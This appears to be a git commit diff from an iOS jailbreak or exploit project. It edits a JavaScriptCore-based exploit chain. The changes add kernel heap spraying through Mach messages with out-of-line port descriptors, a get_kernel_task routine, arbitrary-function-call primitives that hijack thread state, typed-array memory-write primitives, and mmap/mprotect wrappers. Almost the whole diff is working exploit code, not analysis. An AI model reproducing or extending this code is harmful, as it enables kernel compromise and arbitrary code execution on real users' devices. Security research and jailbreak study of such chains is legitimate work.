diff options
Diffstat (limited to 'src')
| -rwxr-xr-x[-rw-r--r--] | src/gen/common.h | 0 | ||||
| -rwxr-xr-x[-rw-r--r--] | src/gen/ip_tools.c | 0 | ||||
| -rwxr-xr-x[-rw-r--r--] | src/gen/ip_tools.h | 0 | ||||
| -rwxr-xr-x[-rw-r--r--] | src/gen/patchfinder.h | 0 | ||||
| -rw-r--r-- | src/gen/shit.c | 62 | ||||
| -rw-r--r-- | src/gen/shit.h | 10 | ||||
| -rwxr-xr-x[-rw-r--r--] | src/gen/stage0_primitives.c | 0 | ||||
| -rwxr-xr-x[-rw-r--r--] | src/gen/stage0_primitives.h | 0 | ||||
| -rwxr-xr-x[-rw-r--r--] | src/gen/stage1_primitives.c | 0 | ||||
| -rwxr-xr-x[-rw-r--r--] | src/gen/stage1_primitives.h | 0 | ||||
| -rwxr-xr-x[-rw-r--r--] | src/js/kexp/exploit.js | 79 | ||||
| -rwxr-xr-x[-rw-r--r--] | src/js/lib/myutils.js | 6 | ||||
| -rw-r--r-- | src/js/main.js | 13 | ||||
| -rw-r--r-- | src/js/primitives/call.js | 25 | ||||
| -rw-r--r-- | src/js/primitives/mem.js | 15 |
15 files changed, 143 insertions, 67 deletions
diff --git a/src/gen/common.h b/src/gen/common.h index 9550400..9550400 100644..100755 --- a/src/gen/common.h +++ b/src/gen/common.h diff --git a/src/gen/ip_tools.c b/src/gen/ip_tools.c index 6e36b64..6e36b64 100644..100755 --- a/src/gen/ip_tools.c +++ b/src/gen/ip_tools.c diff --git a/src/gen/ip_tools.h b/src/gen/ip_tools.h index a011094..a011094 100644..100755 --- a/src/gen/ip_tools.h +++ b/src/gen/ip_tools.h diff --git a/src/gen/patchfinder.h b/src/gen/patchfinder.h index 21af7e3..21af7e3 100644..100755 --- a/src/gen/patchfinder.h +++ b/src/gen/patchfinder.h diff --git a/src/gen/shit.c b/src/gen/shit.c index 6e6c5c5..ef354d4 100644 --- a/src/gen/shit.c +++ b/src/gen/shit.c @@ -1,32 +1,32 @@ -#include <stdarg.h> -#include "common.h" -#include <stdio.h> -#include "shit.h" - -extern FILE* fp; - -int _asprintf(char **strp, const char *fmt, ...) { - va_list ap; - char* tmp = NULL; - - *strp = ""; - - /* - * shit - */ - - va_start(ap, fmt); - vfprintf(fp, fmt, ap); - va_end(ap); - -#if 0 - strcpy(fuck_memory_leaks, tmp); - - if (strp) - *strp = fuck_memory_leaks; - - free(tmp); -#endif - - return 0; +#include <stdarg.h>
+#include "common.h"
+#include <stdio.h>
+#include "shit.h"
+
+extern FILE* fp;
+
+int _asprintf(char **strp, const char *fmt, ...) {
+ va_list ap;
+ char* tmp = NULL;
+
+ *strp = "";
+
+ /*
+ * shit
+ */
+
+ va_start(ap, fmt);
+ vfprintf(fp, fmt, ap);
+ va_end(ap);
+
+#if 0
+ strcpy(fuck_memory_leaks, tmp);
+
+ if (strp)
+ *strp = fuck_memory_leaks;
+
+ free(tmp);
+#endif
+
+ return 0;
}
\ No newline at end of file diff --git a/src/gen/shit.h b/src/gen/shit.h index aaa4b7f..d97a995 100644 --- a/src/gen/shit.h +++ b/src/gen/shit.h @@ -1,6 +1,6 @@ -#ifndef SHIT_H -#define SHIT_H - -int _asprintf(char **strp, const char *fmt, ...); - +#ifndef SHIT_H
+#define SHIT_H
+
+int _asprintf(char **strp, const char *fmt, ...);
+
#endif
\ No newline at end of file diff --git a/src/gen/stage0_primitives.c b/src/gen/stage0_primitives.c index b54cb1a..b54cb1a 100644..100755 --- a/src/gen/stage0_primitives.c +++ b/src/gen/stage0_primitives.c diff --git a/src/gen/stage0_primitives.h b/src/gen/stage0_primitives.h index a9a71eb..a9a71eb 100644..100755 --- a/src/gen/stage0_primitives.h +++ b/src/gen/stage0_primitives.h diff --git a/src/gen/stage1_primitives.c b/src/gen/stage1_primitives.c index ffe7b53..ffe7b53 100644..100755 --- a/src/gen/stage1_primitives.c +++ b/src/gen/stage1_primitives.c diff --git a/src/gen/stage1_primitives.h b/src/gen/stage1_primitives.h index d6b9c33..d6b9c33 100644..100755 --- a/src/gen/stage1_primitives.h +++ b/src/gen/stage1_primitives.h diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js index c28e59c..e0ef574 100644..100755 --- a/src/js/kexp/exploit.js +++ b/src/js/kexp/exploit.js @@ -29,6 +29,7 @@ var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2; var req_init_port_set_address = 0x0 var req_init_port_set_count = 0x4 +var task_self = 0; var kslide = 0; var fakeportData = 0; @@ -93,7 +94,7 @@ function spray_data(mem, size, num, portptr) { function copyinPort(kport, cnt) { var err = malloc(4); var ret = 0; - var self = mach_task_self(); + var self = task_self; var service = MACH_PORT_NULL; var client = malloc(4); var it = malloc(4); @@ -180,23 +181,43 @@ function spray(dict, size, port) { var kp = 0; function spray_ports(number_port_descs) { - printf("spray_ports\n"); + printf("spray_ports %d\n", number_port_descs); if (kp == 0) { kp = malloc(4); - mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, kp); - mach_port_insert_right(mach_task_self(), read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND); + mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp); + mach_port_insert_right(task_self, read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND); } var mp = malloc(4); - mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, mp); - printf("%x\n", read_u32(mp)); - mach_port_insert_right(mach_task_self(), read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND); + mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp); + var rmp = read_u32(mp); + mach_port_insert_right(task_self, rmp, rmp, MACH_MSG_TYPE_MAKE_SEND); - send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs); + send_ports(rmp, read_u32(kp), 2, number_port_descs); return mp; } +function fast_log2(n) { + var i = 0; + while (n >>= 1) { + i++; + } + + return i; +} + +function fast_array_mul(arr, n) { + var tmp_arr = arr; + var done = 0; + for (var i = 0; i < fast_log2(n) + 2; i++) { + tmp_arr = tmp_arr.concat(tmp_arr); + done = (1 << i); + } + + return tmp_arr; +} + function send_ports(target, payload, num, number_port_descs) { var init_port_set = malloc(num * 4); @@ -204,23 +225,51 @@ function send_ports(target, payload, num, number_port_descs) { write_u32(init_port_set + (i << 2), payload); } - var buf = malloc(0x1c + (number_port_descs * 0xc)); + var buf = malloc(0x1c + (number_port_descs * 0xc * 8)); + write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs); + var new_buf_ = new Array(); + var tmp = u32_to_u8x4(init_port_set); + new_buf_.push(tmp[0]); + new_buf_.push(tmp[1]); + new_buf_.push(tmp[2]); + new_buf_.push(tmp[3]); + tmp = u32_to_u8x4(num); + new_buf_.push(tmp[0]); + new_buf_.push(tmp[1]); + new_buf_.push(tmp[2]); + new_buf_.push(tmp[3]); + new_buf_.push(0); + new_buf_.push(0); + new_buf_.push(19); + new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR); + + var new_buf = fast_array_mul(new_buf_, number_port_descs); + + fast_write_buf(buf + req_init_port_set, new_buf); + + /* for (var i = 0; i < number_port_descs; i++) { write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_address, init_port_set); write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_count, num); write_u8(buf + (req_init_port_set * (i + 1)) + 0x8, 0); write_u8(buf + (req_init_port_set * (i + 1)) + 0xa, 19); write_u8(buf + (req_init_port_set * (i + 1)) + 0xb, MACH_MSG_OOL_PORTS_DESCRIPTOR); - } + }*/ write_u32(buf + req_head_msgh_bits, 0x80001513); // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE) write_u32(buf + req_head_msgh_request_port, target); write_u32(buf + req_head_msgh_reply_port, 0); write_u32(buf + req_head_msgh_id, 1337); - return mach_msg(read_u32(buf + 0x0), read_u32(buf + 0x4), read_u32(buf + 0x8), read_u32(buf + 0xc), read_u32(buf + 0x10), read_u32(buf + 0x14), 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL); + var ret = mach_msg(buf, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL); + + free(buf); + + printf("%d %s\n", ret, mach_error_string(ret)); + + return ret; } function get_kernel_task() { @@ -229,11 +278,13 @@ function get_kernel_task() { sanity_port = malloc(4); - mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, sanity_port); - mach_port_insert_right(mach_task_self(), read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND); + task_self = mach_task_self(); + + mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, sanity_port); + mach_port_insert_right(task_self, read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND); limits = malloc(4); write_u32(limits, 1000); - mach_port_set_attributes(mach_task_self(), read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT); + mach_port_set_attributes(task_self, read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT); printf("starting exploit\n"); diff --git a/src/js/lib/myutils.js b/src/js/lib/myutils.js index 51fc055..325c490 100644..100755 --- a/src/js/lib/myutils.js +++ b/src/js/lib/myutils.js @@ -112,4 +112,8 @@ var io_service_open_extended = scall_wrapper("io_service_open_extended"); var IORegistryEntryGetChildIterator = scall_wrapper("IORegistryEntryGetChildIterator"); var IOIteratorNext = scall_wrapper("IOIteratorNext"); var IORegistryEntryGetProperty = scall_wrapper("IORegistryEntryGetProperty"); -var mach_msg = scall_wrapper("mach_msg");
\ No newline at end of file +var mach_msg = scall_wrapper("mach_msg"); +var mmap = scall_wrapper("mmap"); +var free = scall_wrapper("free"); +var mlock = scall_wrapper("mlock"); +var mprotect = scall_wrapper("mprotect");
\ No newline at end of file diff --git a/src/js/main.js b/src/js/main.js index 4d978ef..ee0a627 100644 --- a/src/js/main.js +++ b/src/js/main.js @@ -12,6 +12,13 @@ var ARM_THREAD_STATE_COUNT = 0x11; var ARM_THREAD_STATE = 0x1; var LOG_SYSLOG = 0x28; +var PROT_READ = 0x1; +var PROT_WRITE = 0x2; +var PROT_EXEC = 0x4; + +var MAP_PRIVATE = 0x2; +var MAP_ANON = 0x1000; + try { puts("we out here in jsc"); } catch (e) { @@ -22,10 +29,6 @@ try { puts = function (){}; } -function csbypass() { - -} - function main() { /* * get slide and calculate slid base @@ -45,8 +48,6 @@ function main() { puts("we out here"); puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?"); -// csbypass(); - printf("slide=0x%x\n", slide); printf("*(uint8_t*)base = 0x%x\n", read_u8(base)); printf("*(uint16_t*)base = 0x%x\n", read_u16(base)); diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js index 97a47b6..e382470 100644 --- a/src/js/primitives/call.js +++ b/src/js/primitives/call.js @@ -118,6 +118,8 @@ function calls4arg(sym, r0, r1, r2, r3) { return call4arg(addy, r0, r1, r2, r3); } +var rth = 0; + function callnarg() { if (arguments.length < 1) { return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length); @@ -153,8 +155,15 @@ function callnarg() { calls4arg("pthread_create", threadptr, 0, __stack_chk_fail_resolver + dyld_shc_slide, 0); thread = read_u32(threadptr); write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0)); + rth = read_u32(th); + } + + if (rth === 0) { + rth = read_u32(th); } +// calls4arg("thread_suspend", rth, 0, 0, 0); + /* * write first 4 to r0-r3, rest to stack */ @@ -198,12 +207,8 @@ function callnarg() { /* * set the state */ - calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT); - - /* - * probably un-necessary now, keeping in just in case for now - */ - calls4arg("thread_resume", read_u32(th), 0, 0, 0); + calls4arg("thread_set_state", rth, ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT); + calls4arg("thread_resume", rth, 0, 0, 0); /* * spin wait for return @@ -212,15 +217,15 @@ function callnarg() { /* * reset, it's used as input for thread_state size */ - write_u32(count, 0x100); - calls4arg("thread_get_state", read_u32(th), ARM_THREAD_STATE, thread_state, count); + write_u32(count, 17); + calls4arg("thread_get_state", rth, ARM_THREAD_STATE, thread_state, count); /* * if the pc is in (resolver, resolver + 8), suspend the thread * (to not spin endlessly), read r0 and return */ if (((read_u32(thread_state + (15 << 2)) - (__stack_chk_fail_resolver + dyld_shc_slide)) <= 8) && (read_u32(thread_state + (11 << 2)) == 0x1337)) { - calls4arg("thread_suspend", read_u32(th), 0, 0, 0); + calls4arg("thread_suspend", rth, 0, 0, 0); return read_u32(thread_state); } @@ -262,7 +267,7 @@ function scall() { args_to_pass.push(sptr(arguments[i])); } else { args_to_pass.push(arguments[i]); - if ((arguments[i] & 0xffff0000 == 0xffff0000 || arguments[i] & 0xffff0000 == 0xfffe0000)) { + if ((arguments[i] & 0xffff0000 == 0xffff0000 || arguments[i] & 0xffff0000 == 0xfffe0000) && (i == 1 || i == 3)) { force_callnarg = true; } } diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js index 85cd132..ff12fdd 100644 --- a/src/js/primitives/mem.js +++ b/src/js/primitives/mem.js @@ -91,6 +91,21 @@ function write_u32_buf(addy, buf, len) { return buf; } +function fast_write_buf(addy, buf) { + var upper_i = Math.floor(buf.length / 0x100); + + for (var i = 0; i < upper_i; i++) { + u8x4 = u32_to_u8x4(addy + (i * 0x100)); + parent[VECTOR_OFFSET + 0x0] = u8x4[0]; + parent[VECTOR_OFFSET + 0x1] = u8x4[1]; + parent[VECTOR_OFFSET + 0x2] = u8x4[2]; + parent[VECTOR_OFFSET + 0x3] = u8x4[3]; + for (var j = (i * 0x100); (j < (i * 0x100) + 0x100) && (j < buf.length); j++) { + child[j % 0x100] = buf[j]; + } + } +} + /* * write uint8_t */ |